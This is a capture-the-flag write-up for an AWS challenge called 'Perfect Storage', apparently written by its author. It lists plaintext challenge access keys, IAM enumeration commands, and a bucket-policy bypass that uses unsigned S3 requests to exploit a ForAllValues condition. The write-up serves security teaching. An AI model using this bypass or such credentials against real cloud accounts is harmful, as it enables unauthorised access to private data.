Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page
  • Description
  • Solve

Was this helpful?

  1. Authored
  2. Cyber League 2025 Major 1

Perfect Storage

PreviousCyber League 2025 Major 1Nextcatalog commits

Last updated 4 months ago

Was this helpful?

Description

The intern is exploring S3 buckets to host internal documents. He insists that he has scoped the IAM policy correctly to restrict access solely to the admin. Prove the intern wrong by escalating your user privileges and access the secret document!

Attached File: user.txt

aws_access_key_id = AKIAU24SYXUWGFF2Y2GS
aws_secret_access_key = ylEfloqS+B+O56WesG7qg8fEl0F1WD79OyckBuTf

Solve

Since the challenge description mentioned IAM, lets attempt to perform IAM enumeration on the user.

aws iam list-attached-user-policies --user-name thisisauselessuserfortesting --profile perfect_storage

Doing standard enumeration, we noticed the user have the policy hackerman101 attached. Lets attempt to enumerate the policy now.

aws iam get-policy --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --profile perfect_storage
aws iam get-policy-version --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --version-id v2 --profile perfect_storage

In the iam policy, we noticed that the user thisisauselessuserfortestinghas the get bucket permission for perfect-storage-7815696ecbf1c96

However, when attempting to access the s3 bucket, we are met with an explicit deny in an identity based policy.

Lets attempt to get the bucket policy to see if theres any policy that is explicitly denying our permission.

aws s3api get-bucket-policy --bucket perfect-storage-7815696ecbf1c96 --profile perfect_storage

I have attached the prettified

{
    "Policy": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": "*",
                "Action": [
                    "s3:ListBucket",
                    "s3:GetObject"
                ],
                "Resource": [
                    "arn:aws:s3:::perfect-storage-7815696ecbf1c96/*",
                    "arn:aws:s3:::perfect-storage-7815696ecbf1c96"
                ],
                "Condition": {
                    "ForAllValues:StringLike": {
                        "aws:PrincipalArn": "arn:aws:iam::666666666666:user/admin"
                    }
                }
            }
        ]
    }
}

Here we can see the bucket policy allow all principal (ie any user) to perform list bucket and get object. However, there is a condition where the user principal arn is arn:aws:iam::666666666666:user/admin

The ForAllValuesis overtly permissive according to aws documentation.

So if we are able to pass the PrincipalArn as empty, we are able to bypass this policy.

aws s3 ls s3://perfect-storage-7815696ecbf1c96 --profile perfect_storage
aws s3 ls s3://perfect-storage-7815696ecbf1c96  --no-sign-request

Comparing the output between both s3 list object, we can see the second one with the --no-sign-requestis able to bypass the policy.

aws s3 cp s3://perfect-storage-7815696ecbf1c96/flag.txt - --no-sign-request

Single-valued vs. multivalued context keys - AWS Identity and Access Management
Logo
sanity check that the credential works